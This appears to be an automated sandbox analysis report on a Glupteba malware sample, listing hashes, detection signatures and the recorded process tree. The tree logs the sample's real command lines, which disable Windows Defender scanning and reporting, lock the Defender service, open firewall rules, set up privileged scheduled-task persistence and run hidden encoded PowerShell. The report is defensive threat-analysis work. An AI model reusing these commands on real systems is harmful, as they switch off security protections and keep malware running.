Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20231220-en
  • resource tags

    arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-02-2024 03:41

General

  • Target

    57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe

  • Size

    177KB

  • MD5

    05e32cf85ff2c9c7bc92d6b751c02b1b

  • SHA1

    95e91a3893640d9f9dd80cf5f0f820de54fccd2a

  • SHA256

    57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d

  • SHA512

    fc81e09eedb9ca907ab54cebe0f3f54cebc86f36fe036dcf0a97c131ccc5ae67832dbe902ae470b23c0dad62708555f5a4c2b4a9a71592ba5d42ee868322ed67

  • SSDEEP

    3072:7gMyg1MbPUWdfkUXjqYffa6R2sChyJz2OgpnGaxNTgiqOweoUEMF98sDMOSx:sgw8WdxTqcfaO2sbJbgvxNTg0weJ/W

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 21 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 11 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 40 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
    "C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4500
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Users\Admin\Pictures\sjUStLBAW9tuwZz4DHnIakPz.exe
        "C:\Users\Admin\Pictures\sjUStLBAW9tuwZz4DHnIakPz.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 392
          4⤵
          • Program crash
          PID:4440
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 396
          4⤵
          • Program crash
          PID:3516
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 408
          4⤵
          • Program crash
          PID:4584
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 588
          4⤵
          • Program crash
          PID:3940
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 620
          4⤵
          • Program crash
          PID:4424
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 700
          4⤵
          • Program crash
          PID:5072
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 812
          4⤵
          • Program crash
          PID:1628
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 784
          4⤵
          • Program crash
          PID:3408
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 796
          4⤵
          • Program crash
          PID:4860
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 836
          4⤵
          • Program crash
          PID:4896
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 848
          4⤵
          • Program crash
          PID:3008
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 604
          4⤵
          • Program crash
          PID:600
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 836
          4⤵
          • Program crash
          PID:2824
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
            PID:5052
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 784
            4⤵
            • Program crash
            PID:1304
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 712
            4⤵
            • Program crash
            PID:412
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 572
            4⤵
            • Program crash
            PID:5116
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 748
            4⤵
            • Program crash
            PID:4852
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 712
            4⤵
            • Program crash
            PID:2064
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 664
            4⤵
            • Program crash
            PID:2648
          • C:\Users\Admin\Pictures\sjUStLBAW9tuwZz4DHnIakPz.exe
            "C:\Users\Admin\Pictures\sjUStLBAW9tuwZz4DHnIakPz.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3432
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
                PID:4728
              • C:\Windows\System32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                5⤵
                  PID:4476
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:4732
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 512
                  5⤵
                  • Program crash
                  PID:1960
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 788
                  5⤵
                  • Program crash
                  PID:4520
            • C:\Users\Admin\Pictures\WGsPNpWdqW1szkjZYrMv8SmT.exe
              "C:\Users\Admin\Pictures\WGsPNpWdqW1szkjZYrMv8SmT.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3832
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 368
                4⤵
                • Program crash
                PID:3744
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 404
                4⤵
                • Program crash
                PID:3176
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 588
                4⤵
                • Program crash
                PID:2024
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 696
                4⤵
                • Program crash
                PID:1036
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 732
                4⤵
                • Program crash
                PID:1984
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 568
                4⤵
                • Program crash
                PID:352
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 624
                4⤵
                • Program crash
                PID:3380
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 804
                4⤵
                • Program crash
                PID:2608
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 796
                4⤵
                • Program crash
                PID:2300
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                4⤵
                  PID:4184
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 700
                  4⤵
                  • Program crash
                  PID:2284
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 596
                  4⤵
                  • Program crash
                  PID:2388
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 780
                  4⤵
                  • Program crash
                  PID:3624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 636
                  4⤵
                  • Program crash
                  PID:4520
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 660
                  4⤵
                  • Program crash
                  PID:1560
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 388
                  4⤵
                  • Program crash
                  PID:4632
                • C:\Users\Admin\Pictures\WGsPNpWdqW1szkjZYrMv8SmT.exe
                  "C:\Users\Admin\Pictures\WGsPNpWdqW1szkjZYrMv8SmT.exe"
                  4⤵
                  • Windows security bypass
                  • Executes dropped EXE
                  • Windows security modification
                  • Adds Run key to start application
                  • Checks for VirtualBox DLLs, possible anti-VM trick
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2260
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 356
                    5⤵
                    • Program crash
                    PID:4916
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 372
                    5⤵
                    • Program crash
                    PID:4212
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 588
                    5⤵
                    • Program crash
                    PID:3848
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 648
                    5⤵
                    • Program crash
                    PID:1120
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 680
                    5⤵
                    • Program crash
                    PID:5044
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 560
                    5⤵
                    • Program crash
                    PID:696
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 668
                    5⤵
                    • Program crash
                    PID:2148
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      6⤵
                        PID:3216
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 764
                      5⤵
                      • Program crash
                      PID:4600
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 336
                      5⤵
                      • Program crash
                      PID:2492
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2304
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3848
                    • C:\Windows\System32\cmd.exe
                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                      5⤵
                        PID:2908
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                          PID:808
                        • C:\Windows\rss\csrss.exe
                          C:\Windows\rss\csrss.exe
                          5⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Manipulates WinMonFS driver.
                          • Drops file in Windows directory
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4348
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 396
                            6⤵
                            • Program crash
                            PID:4636
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 404
                            6⤵
                            • Program crash
                            PID:3568
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 756
                            6⤵
                            • Program crash
                            PID:2212
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 800
                            6⤵
                            • Program crash
                            PID:928
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 660
                            6⤵
                            • Program crash
                            PID:3004
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4948
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              7⤵
                                PID:316
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 712
                              6⤵
                              • Program crash
                              PID:3748
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 668
                              6⤵
                              • Program crash
                              PID:4152
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 656
                              6⤵
                              • Program crash
                              PID:932
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 388
                              6⤵
                              • Program crash
                              PID:2832
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 588
                              6⤵
                              • Program crash
                              PID:4308
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                                PID:1984
                                • C:\Windows\SysWOW64\reg.exe
                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                  7⤵
                                    PID:4576
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /delete /tn ScheduledUpdate /f
                                  6⤵
                                    PID:2240
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:4600
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 856
                                    6⤵
                                      PID:4128
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 872
                                      6⤵
                                        PID:3208
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        6⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:592
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 904
                                        6⤵
                                          PID:1668
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 964
                                          6⤵
                                            PID:1504
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              7⤵
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4584
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                            6⤵
                                            • Executes dropped EXE
                                            PID:3756
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 972
                                            6⤵
                                              PID:4976
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 932
                                              6⤵
                                                PID:4236
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:4504
                                              • C:\Windows\windefender.exe
                                                "C:\Windows\windefender.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:2148
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1036
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:928
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1112
                                                6⤵
                                                  PID:3032
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1140
                                                  6⤵
                                                    PID:3660
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1216
                                                    6⤵
                                                      PID:5012
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1180
                                                      6⤵
                                                        PID:2172
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1084
                                                        6⤵
                                                          PID:2964
                                                  • C:\Users\Admin\Pictures\tImM3RKeKAVFGT2xp5q8ikU4.exe
                                                    "C:\Users\Admin\Pictures\tImM3RKeKAVFGT2xp5q8ikU4.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:1628
                                                  • C:\Users\Admin\Pictures\GPFWnDdUKgO3n4uKvBdUXcDe.exe
                                                    "C:\Users\Admin\Pictures\GPFWnDdUKgO3n4uKvBdUXcDe.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3448
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8368.tmp\Install.exe
                                                      .\Install.exe
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1176
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8722.tmp\Install.exe
                                                        .\Install.exe /mGaXdidI "385118" /S
                                                        5⤵
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Checks for any installed AV software in registry
                                                        • Drops file in System32 directory
                                                        • Enumerates system info in registry
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3892
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                          6⤵
                                                            PID:2904
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                              7⤵
                                                                PID:2144
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                  8⤵
                                                                    PID:5108
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                    8⤵
                                                                      PID:1124
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                  6⤵
                                                                    PID:316
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                      7⤵
                                                                        PID:4872
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                          8⤵
                                                                            PID:3380
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                            8⤵
                                                                              PID:4728
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gJlUDuteF" /SC once /ST 00:48:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          6⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:2624
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gJlUDuteF"
                                                                          6⤵
                                                                            PID:4424
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              7⤵
                                                                                PID:4872
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /DELETE /F /TN "gJlUDuteF"
                                                                              6⤵
                                                                                PID:4916
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  7⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4184
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\ONCbteG.exe\" cj /kAsite_idzXl 385118 /S" /V1 /F
                                                                                6⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:4212
                                                                        • C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe
                                                                          "C:\Users\Admin\Pictures\mlb64NOLl5sxzm5WJbtT033Y.exe" --silent --allusers=0
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Enumerates connected drives
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2296
                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:2608
                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\assistant_installer.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\assistant_installer.exe" --version
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:3568
                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\assistant_installer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xa72614,0xa72620,0xa7262c
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:2956
                                                                        • C:\Users\Admin\Pictures\ftG7PNU93GqMIG0XdTYqud4b.exe
